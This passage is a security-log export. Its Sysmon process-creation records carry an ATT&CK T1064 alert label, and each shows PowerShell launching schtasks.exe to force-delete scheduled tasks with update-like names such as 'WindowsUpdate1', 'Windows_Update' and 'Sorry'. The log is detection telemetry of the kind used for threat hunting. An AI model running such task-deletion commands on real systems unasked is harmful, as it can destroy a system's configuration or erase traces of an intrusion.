12:50:31.414"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-00103da32100}"",""processId"":""3664"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.463",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.381 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-0010a7a12100} +ProcessId: 7068 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.384659500Z"",""eventRecordID"":""2801"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.381\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-0010a7a12100}\r\nProcessId: 7068\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.381"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-0010a7a12100}"",""processId"":""7068"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.450",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.347 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-001012a02100} +ProcessId: 6544 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update_windows /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update_windows /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.351820100Z"",""eventRecordID"":""2800"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.347\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-001012a02100}\r\nProcessId: 6544\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update_windows /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.347"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-001012a02100}"",""processId"":""6544"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update_windows /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.417",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.313 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-00107c9e2100} +ProcessId: 3276 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Windows_Update /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Windows_Update /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.317220200Z"",""eventRecordID"":""2799"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.313\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-00107c9e2100}\r\nProcessId: 3276\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Windows_Update /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.313"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-00107c9e2100}"",""processId"":""3276"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Windows_Update /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.400",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.274 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-0010bf9c2100} +ProcessId: 336 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Sorry /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Sorry /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.280084100Z"",""eventRecordID"":""2798"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.274\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-0010bf9c2100}\r\nProcessId: 336\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Sorry /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.274"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-0010bf9c2100}"",""processId"":""336"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Sorry /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.384",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.225 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-0010ed9a2100} +ProcessId: 2096 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ngm /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ngm /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.230922300Z"",""eventRecordID"":""2797"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.225\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-0010ed9a2100}\r\nProcessId: 2096\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ngm /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.225"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-0010ed9a2100}"",""processId"":""2096"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ngm /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.370",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.160 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-00103b992100} +ProcessId: 4884 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN gm /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN gm /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.171889000Z"",""eventRecordID"":""2796"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.160\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-00103b992100}\r\nProcessId: 4884\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN gm /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.160"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-00103b992100}"",""processId"":""4884"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN gm /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 